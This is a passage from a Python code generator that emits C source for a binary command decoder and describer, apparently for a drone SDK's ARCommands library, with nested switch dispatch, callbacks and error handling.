')\n') cfile.write (' {\n') cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' switch (commandFeature)\n') cfile.write (' {\n') #regroup multisetting msgs by feature and by class multiset_sorted = {} for multiset_msg in arg.argType.msgs: multiset_cl = multiset_msg.cls if multiset_msg.cls else ArClass('defaultCls', 0, '') if not multiset_msg.ftr in multiset_sorted: multiset_sorted[multiset_msg.ftr] = {} if not multiset_cl in multiset_sorted[multiset_msg.ftr]: multiset_sorted[multiset_msg.ftr][multiset_cl] = [] multiset_sorted[multiset_msg.ftr][multiset_cl].append(multiset_msg) get_name = lambda x: x.name for multiset_ftr in sorted(multiset_sorted.keys(), key=get_name): cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(multiset_ftr)) + ':\n') cfile.write (' switch (commandClass)\n') cfile.write (' {\n') for multiset_cl in sorted(multiset_sorted[multiset_ftr].keys(), key=get_name): cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_CLASS', multiset_cl.name) + ':\n') cfile.write (' switch (commandId)\n') cfile.write (' {\n') for multiset_msg in multiset_sorted[multiset_ftr][multiset_cl]: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(multiset_ftr) + '_' + multiset_cl.name + '_CMD', multiset_msg.name) + ':\n') if multiset_msg.cls: cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("{' + get_ftr_old_name(multiset_ftr) + '.' + multiset_cl.name +'.' + multiset_msg.name + ':", resString, strLen, *strOffset) ;\n') else: cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("{' + get_ftr_old_name(multiset_ftr) + '.' + multiset_msg.name + ':", resString, strLen, *strOffset) ;\n') cfile.write (' if (*strOffset < 0)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' } // No else --> Do not modify retVal if no error occured\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(multiset_ftr)) + ARCapitalize (format_cmd_name(multiset_msg)) + 'DescribeArgs') + '(buffer, buffLen, offset, resString, strLen, strOffset);\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("}", resString, strLen, *strOffset) ;\n') cfile.write (' if (*strOffset < 0)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' } // No else --> Do not modify retVal if no error occured\n') cfile.write (' }\n') cfile.write (' break;\n') cfile.write (' default:\n') cfile.write (' // Command unknown\n') cfile.write (' *offset += cmdSize;\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' break;\n') cfile.write (' default:\n') cfile.write (' // Command unknown\n') cfile.write (' *offset += cmdSize;\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' break;\n') cfile.write (' default:\n') cfile.write (' // Command unknown\n') cfile.write (' *offset += cmdSize;\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' if ((retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ') &&\n') cfile.write (' (*offset < multisetEnd))\n') cfile.write (' {\n') cfile.write (' cmdSize = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' /* buffer end */\n') cfile.write (' break;\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' *strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("}", resString, strLen, *strOffset) ;\n') cfile.write (' if (*strOffset < 0)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' } // No else --> Do not modify retVal if no error occured\n') cfile.write (' } // No else --> Processing block\n') else: cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' ' + xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) + ' arg = ' + xmlToReader (ftr, cmd, arg) + ' (buffer, buffLen, offset, &error);\n') cfile.write (' if (error == 0)\n') cfile.write (' {\n') cfile.write (' *strOffset = ' + xmlToPrinter (ftr, cmd, arg) + ' (" | ' + arg.name + ' -> ", arg, resString, strLen, *strOffset);\n') cfile.write (' if (*strOffset < 0)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' } // No else --> Do not modify retVal if no error occured\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' }\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write ('// DECODER ENTRY POINT\n') cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n') cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' (const uint8_t *buffer, int32_t buffLen)\n') cfile.write ('{\n') cfile.write (' return ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (NULL, buffer, buffLen);\n'); cfile.write ('}\n\n') cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n') cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeCommand') + ' (ARCOMMANDS_Decoder_t *decoder, const uint8_t *buffer, int32_t buffLen)\n') cfile.write ('{\n') cfile.write (' ' + AREnumName (LIB_MODULE, ID_SUBMODULE, 'FEATURE') + ' commandFeature = -1;\n') cfile.write (' int commandClass = -1;\n') cfile.write (' int commandId = -1;\n') cfile.write (' int32_t error = 0;\n') cfile.write (' int32_t offset = 0;\n') cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n') cfile.write (' if (NULL == buffer)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n') cfile.write (' } // No else --> Arg check\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' if (' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' () == 0)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n') cfile.write (' } // No else --> keep retVal to OK if init went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, &offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' switch (commandFeature)\n') cfile.write (' {\n') for ftr in allFeatures: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ':\n') cfile.write (' {\n') if ftr.classes : #project only cfile.write (' switch (commandClass)\n') cfile.write (' {\n') for cl in ftr.classes: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ':\n') cfile.write (' {\n') cfile.write (' switch (commandId)\n') cfile.write (' {\n') for cmd in cl.cmds: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ':\n') cfile.write (' {\n') CBNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Cb') CBCUSTOMNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Custom') DECODER_CBNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Callback' DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cl.name) + ARCapitalize (cmd.name) + 'Custom' cfile.write (' if (decoder) {\n') cfile.write (' ARSAL_Mutex_Lock (&decoder->mutex);\n') cfile.write (' } else {\n') cfile.write (' ARSAL_Mutex_Lock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n') cfile.write (' }\n') cfile.write (' if ((decoder && decoder->' + DECODER_CBNAME + ') || (!decoder && ' + CBNAME + '))\n') cfile.write (' {\n') for arg in cmd.args: if ArArgType.STRING == arg.argType: cfile.write (' ' + xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ' = NULL;\n') else: cfile.write (' ' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ';\n') if cmd.args: cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize(cl.name) + ARCapitalize (cmd.name) + 'DecodeArgs') + '(buffer, buffLen, &offset') for arg in cmd.args: cfile.write (', &_' + arg.name) cfile.write (');\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' if (decoder && decoder->' + DECODER_CBNAME + ') {\n') cfile.write (' decoder->' + DECODER_CBNAME + ' (') first = True for arg in cmd.args: if first: first = False else: cfile.write (', ') if isinstance(arg.argType, ArMultiSetting): cfile.write ('&_' + arg.name) else: cfile.write ('_' + arg.name) if not first: cfile.write (', ') cfile.write ('decoder->' + DECODER_CBCUSTOMNAME + ');\n') cfile.write (' } else {\n') cfile.write (' ' + CBNAME + ' (') first = True for arg in cmd.args: if first: first = False else: cfile.write (', ') if isinstance(arg.argType, ArMultiSetting): cfile.write ('&_' + arg.name) else: cfile.write ('_' + arg.name) if not first: cfile.write (', ') cfile.write (CBCUSTOMNAME + ');\n') cfile.write (' }\n') cfile.write (' } // No else --> Processing block\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NO_CALLBACK') + ';\n') cfile.write (' }\n') cfile.write (' if (decoder) {\n') cfile.write (' ARSAL_Mutex_Unlock (&decoder->mutex);\n') cfile.write (' } else {\n') cfile.write (' ARSAL_Mutex_Unlock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ' */\n') cfile.write (' default:\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ' */\n') cfile.write (' default:\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n') cfile.write (' break;\n') cfile.write (' }\n') else: cfile.write (' if (commandClass == ' + ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') + ')\n') cfile.write (' {\n') cfile.write (' switch (commandId)\n') cfile.write (' {\n') for cmd in ftr.cmds + ftr.evts: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ':\n') cfile.write (' {\n') CBNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Cb') CBCUSTOMNAME = ARGlobalName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Custom') DECODER_CBNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Callback' DECODER_CBCUSTOMNAME = ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (cmd.name) + 'Custom' cfile.write (' if (decoder) {\n') cfile.write (' ARSAL_Mutex_Lock (&decoder->mutex);\n') cfile.write (' } else {\n') cfile.write (' ARSAL_Mutex_Lock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n') cfile.write (' }\n') cfile.write (' if ((decoder && decoder->' + DECODER_CBNAME + ') || (!decoder && ' + CBNAME + '))\n') cfile.write (' {\n') for arg in cmd.args: if ArArgType.STRING == arg.argType: cfile.write (' ' + xmlToCcharAreConst (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ' = NULL;\n') else: cfile.write (' ' + xmlToC (LIB_MODULE, ftr, cmd, arg) + ' _' + arg.name + ';\n') if cmd.args: cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DecodeArgs') + '(buffer, buffLen, &offset') for arg in cmd.args: cfile.write (', &_' + arg.name) cfile.write (');\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' if (decoder && decoder->' + DECODER_CBNAME + ') {\n') cfile.write (' decoder->' + DECODER_CBNAME + ' (') first = True for arg in cmd.args: if first: first = False else: cfile.write (', ') if isinstance(arg.argType, ArMultiSetting): cfile.write ('&_' + arg.name) else: cfile.write ('_' + arg.name) if not first: cfile.write (', ') cfile.write ('decoder->' + DECODER_CBCUSTOMNAME + ');\n') cfile.write (' } else {\n') cfile.write (' ' + CBNAME + ' (') first = True for arg in cmd.args: if first: first = False else: cfile.write (', ') if isinstance(arg.argType, ArMultiSetting): cfile.write ('&_' + arg.name) else: cfile.write ('_' + arg.name) if not first: cfile.write (', ') cfile.write (CBCUSTOMNAME + ');\n') cfile.write (' }\n') cfile.write (' } // No else --> Processing block\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NO_CALLBACK') + ';\n') cfile.write (' }\n') cfile.write (' if (decoder) {\n') cfile.write (' ARSAL_Mutex_Unlock (&decoder->mutex);\n') cfile.write (' } else {\n') cfile.write (' ARSAL_Mutex_Unlock (&' + ARGlobalName (LIB_MODULE, DEC_SUBMODULE, 'mutex') + ');\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ' */\n') cfile.write (' default:\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ' */\n') cfile.write (' default:\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' } // No else --> Processing block\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') cfile.write (AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + '\n') cfile.write (ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DescribeBuffer') + ' (uint8_t *buffer, int32_t buffLen, char *resString, int32_t stringLen)\n') cfile.write ('{\n') cfile.write (' ' + AREnumName (LIB_MODULE, ID_SUBMODULE, 'FEATURE') + ' commandFeature = -1;\n') cfile.write (' int commandClass = -1;\n') cfile.write (' int commandId = -1;\n') cfile.write (' int32_t offset = 0;\n') cfile.write (' int32_t error = 0;\n') cfile.write (' int strOffset = 0;\n') cfile.write (' ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ';\n') cfile.write (' if ((NULL == buffer) || (NULL == resString))\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n') cfile.write (' } // No else --> Arg check\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' if (' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'Init') + ' () == 0)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n') cfile.write (' } // No else --> keep retVal to OK if init went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandFeature = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandClass = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read8FromBuffer') + ' (buffer, buffLen, &offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' commandId = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Read16FromBuffer') + ' (buffer, buffLen, &offset, &error);\n') cfile.write (' if (error == 1)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ';\n') cfile.write (' } // No else --> Do not modify retVal if read went fine\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' && stringLen > 0)\n') cfile.write (' {\n') cfile.write (' resString[0] = \'\\0\';\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ';\n') cfile.write (' }\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' switch (commandFeature)\n') cfile.write (' {\n') for ftr in allFeatures: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ':\n') cfile.write (' {\n') if ftr.classes: #project only cfile.write (' switch (commandClass)\n') cfile.write (' {\n') for cl in ftr.classes: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ':\n') cfile.write (' {\n') cfile.write (' switch (commandId)\n') cfile.write (' {\n') for cmd in cl.cmds: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ':\n') cfile.write (' {\n') cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.' + cl.name + '.' + cmd.name + ':", resString, stringLen, strOffset) ;\n') if cmd.args: cfile.write (' if (strOffset > 0)\n') cfile.write (' {\n') cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + '(buffer, buffLen, &offset, resString, stringLen, &strOffset);\n') cfile.write (' } // No else --> If first print failed, the next if will set the error code\n') cfile.write ('\n') cfile.write (' if (strOffset < 0)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' } // No else --> Do not modify retVal if no error occured\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cl.name + '_CMD', cmd.name) + ' */\n') cfile.write (' default:\n') cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.' + cl.name + '.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n') cfile.write (' break;\n') cfile.write (' }\n') cfile.write (' }\n') cfile.write (' break; /* ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cl.name) + ' */\n') cfile.write (' default:\n') cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.UNKNOWN -> Unknown command", resString, stringLen, strOffset);\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ';\n') cfile.write (' break;\n') cfile.write (' }\n') else: cfile.write (' if (commandClass == ' + ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') + ')\n') cfile.write (' {\n') cfile.write (' switch (commandId)\n') cfile.write (' {\n') for cmd in ftr.cmds + ftr.evts: cfile.write (' case ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) + ':\n') cfile.write (' {\n') cfile.write (' strOffset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' ("' + get_ftr_old_name(ftr) + '.' + cmd.name + ':", resString, stringLen, strOffset) ;\n') if cmd.args: cfile.write (' if (strOffset > 0)\n') cfile.write (' {\n') cfile.write (' retVal = '+ ARFunctionName (LIB_MODULE, DEC_SUBMODULE, ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd)) + 'DescribeArgs') + '(buffer, buffLen, &offset, resString, stringLen, &strOffset);\n') cfile.write (' } // No else --> If first print failed, the next if will set the error code\n') cfile.write ('\n') cfile.write (' if (strOffset < 0)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, 